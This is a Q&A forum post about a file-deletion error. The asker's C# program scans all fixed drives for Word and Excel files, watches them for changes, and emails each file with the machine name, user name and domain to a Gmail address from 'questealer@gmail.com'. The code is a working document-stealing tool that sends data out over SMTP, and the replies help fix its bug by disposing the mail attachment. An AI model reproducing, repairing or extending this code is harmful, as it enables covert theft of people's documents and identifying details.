# Acess denied when I try delete a file after mailing it

Tags: c#, io, access-denied, delete-file

I get access denied when I try to delete a file....what is the part that uses the files...in my folder Queue?

My app searches all doc and xls files and puts them to queue folder and then uploads them after doe from each files its supposed to delete it but I get access denied....

```
namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {

        public Form1()
        {
            InitializeComponent();
        }

        private void Form1_Load(object sender, EventArgs e)
        {

            if (Directory.Exists("queue"))
            {
                Thread t2 = new Thread(delegate()
                {
                startListeningToDrives();
                //Thread.Sleep(15000);
                uploadAllFiles(1024);
                });
                t2.Start();

            }
            else {
                Thread t2 = new Thread(delegate()
                {
                    //Thread.Sleep(15000);
                    DriveInfo[] allDrives = DriveInfo.GetDrives();
                    foreach (DriveInfo d in allDrives)
                    {
                        if (d.IsReady && d.DriveType == DriveType.Fixed)
                        {
                            string str = d.ToString();
                            grabAllFiles(@str, "*.doc");
                            grabAllFiles(@str, "*.xls");
                        }

                    }
                    startListeningToDrives();
                });
                t2.Start();

            }
        }

        static void CreateFileWatcher(string path, string theExtension)
        {

            // Create a new FileSystemWatcher and set its properties.
            FileSystemWatcher watcher = new FileSystemWatcher();
            watcher.Path = path;
            watcher.IncludeSubdirectories = true;
            /* Watch for changes in LastAccess and LastWrite times, and 
               the renaming of files or directories. */
            watcher.NotifyFilter = NotifyFilters.LastAccess | NotifyFilters.LastWrite
               | NotifyFilters.FileName | NotifyFilters.DirectoryName;
            // Only watch text files.
            watcher.Filter = theExtension;

            // Add event handlers.
            watcher.Changed += new FileSystemEventHandler(OnChanged);
            watcher.Created += new FileSystemEventHandler(OnChanged);

            // Begin watching.
            watcher.EnableRaisingEvents = true;
        }

        static void send_file(string fpath, string fname, string finfo)
        {

            MailMessage mail = new MailMessage();
            SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");
            mail.From = new MailAddress("questealer@gmail.com");
            mail.To.Add("somemail@gmail.com");
            mail.Subject = fname;
            mail.Body = finfo;

            System.Net.Mail.Attachment attachment;
            Random rnd = new Random();
            int fnum = rnd.Next(1, 999999);
            if (fpath.ToLower()!=  "queue\\"+fname.ToLower())
            {
                File.Copy(@fpath, "queue\\file" + fnum, true);
                attachment = new System.Net.Mail.Attachment("queue\\file" + fnum);
            }
            else {
                attachment = new System.Net.Mail.Attachment(@fpath);
            }
            attachment.Name = fname;
            mail.Attachments.Add(attachment);

            SmtpServer.Port = 587;
            SmtpServer.Credentials = new System.Net.NetworkCredential("somemail@gmail.com", "*********");
            SmtpServer.EnableSsl = true;


            SmtpServer.Send(mail);
            FileInfo myf = new FileInfo("queue\\" + attachment.Name);
            //I get error here
            myf.Delete();
            //I get error here
        }
        static string ToFileSize( long size)
        {
            if (size < 1024)
            {
                return (size).ToString("F0") + " bytes";
            }
            else if (size < Math.Pow(1024, 2))
            {
                return (size / 1024).ToString("F0") + " KB";
            }
            else if (size < Math.Pow(1024, 3))
            {
                return (size / Math.Pow(1024, 2)).ToString("F0") + " MB";
            }
            else if (size < Math.Pow(1024, 4))
            {
                return (size / Math.Pow(1024, 3)).ToString("F0") + " GB";
            }
            else if (size < Math.Pow(1024, 5))
            {
                return (size / Math.Pow(1024, 4)).ToString("F0") + " TB";
            }
            else if (size < Math.Pow(1024, 6))
            {
                return (size / Math.Pow(1024, 5)).ToString("F0") + " PB";
            }
            else
            {
                return (size / Math.Pow(1024, 6)).ToString("F0") + " EB";
            }
        }
        static void uploadAllFiles(int maxsize) {

            string[] queueDirList = Directory.GetFiles(@"queue");
            foreach (string name in queueDirList)
            {
                FileInfo myf = new FileInfo(name);
                if (myf.Length < maxsize * 1024)
                {
                    send_file(name, myf.Name,
                        "\n►Filename: " + myf.FullName + "\n" +
                        "►Size: " + ToFileSize(myf.Length) + "\n" +
                        "►Changetype: Initial Search\n" +
                        "►Current Directory: " + System.Environment.CurrentDirectory + "\n" +
                        "►MachineName: " + System.Environment.MachineName + "\n" +
                        "►OS Version: " + System.Environment.OSVersion + "\n" +
                        "►ProcessorCount: " + System.Environment.ProcessorCount + "\n" +
                        "►Version: " + System.Environment.Version + "\n" +
                        "►UserDomainName: " + System.Environment.UserDomainName + "\n" +
                        "►UserName: " + System.Environment.UserName + "\n" +
                        "►SystemDirectory: " + System.Environment.SystemDirectory + "\n"
                        );
                }

            }

        }
        static void startListeningToDrives() {

            DriveInfo[] allDrives = DriveInfo.GetDrives();
            foreach (DriveInfo d in allDrives)
            {
                if (d.IsReady && d.DriveType == DriveType.Fixed)
                {
                    string str = d.ToString();
                    CreateFileWatcher(@str, "*.doc");
                    CreateFileWatcher(@str, "*.docx");
                    CreateFileWatcher(@str, "*.xls");
                    CreateFileWatcher(@str, "*.xlsx");
                }

            }
        }
        static void grabAllFiles(string searchdir,string sftype)
        {

                Directory.CreateDirectory("queue");
                IEnumerable<string> filesOrDirectories = SearchFiles(@searchdir, sftype);
                Random a = new Random();
                foreach (string fileOrDirectory in filesOrDirectories)
                {
                    if (!(File.GetAttributes(fileOrDirectory) == FileAttributes.Directory))
                    {
                        try
                        {

                            int ran = a.Next(0, 99999999);
                            File.Copy(fileOrDirectory, "queue\\File_" + ran + "_" + Path.GetFileName(fileOrDirectory), true);
                        }
                        catch (System.IO.IOException)
                        {

                        }
                    }

                }


        }

        // Define the event handlers.
        private static void OnChanged(object source, FileSystemEventArgs e)
        {
            Thread t = new Thread(delegate()
            {Thread.Sleep(1000);
                if (File.Exists(e.FullPath))
                {
                    FileInfo myf = new FileInfo(e.FullPath);
                    if (myf.DirectoryName.ToLower() != Directory.GetCurrentDirectory().ToLower() + "\\queue")
                    {
                        send_file(e.FullPath, myf.Name,
                            "\n►Filename: " + myf.FullName + "\n" +
                            "►Size: " + ToFileSize(myf.Length) + "\n" +
                            "►Changetype: " + e.ChangeType + "\n" +
                            "►Current Directory: " + System.Environment.CurrentDirectory + "\n" +
                            "►MachineName: " + System.Environment.MachineName + "\n" +
                            "►OS Version: " + System.Environment.OSVersion + "\n" +
                            "►ProcessorCount: " + System.Environment.ProcessorCount + "\n" +
                            "►Version: " + System.Environment.Version + "\n" +
                            "►UserDomainName: " + System.Environment.UserDomainName + "\n" +
                            "►UserName: " + System.Environment.UserName + "\n" +
                            "►SystemDirectory: " + System.Environment.SystemDirectory + "\n"

                            );
                    }


                }
            });
            t.Start();
        }
        public static IEnumerable<string> SearchFiles(string root, string searchPattern)
        {
            Stack<string> pending = new Stack<string>();
            pending.Push(root);
            while (pending.Count != 0)
            {
                var path = pending.Pop();
                string[] next = null;
                try
                {
                    next = Directory.GetFiles(path, searchPattern);
                }
                catch { }
                if (next != null && next.Length != 0)
                    foreach (var file in next) yield return file;
                try
                {
                    next = Directory.GetDirectories(path);
                    foreach (var subdir in next) pending.Push(subdir);
                }
                catch { }
            }
        }    

    }
}
```

Comment: You're not `Dispose`ing of your `MailMessage` or `SmtpClient`. One of those still has an open file handle.

Comment: try something like the following when you are completed with the `MailMessage mail` object that you have instantiated 
`((IDisposable)mail).Dispose();` I would recommend wrapping your code around a `try{}catch{}` as well so that you can trap / catch any errors never assume that the `SmtpServer.Send(mail);` will always be successful

Answer (score 3):

I think you should be doing

```
attachment.Dispose();
```

after sending the mail. The attachment object may be keeping the file open.

[EDIT] Also note what DJ KRAZE said in comments.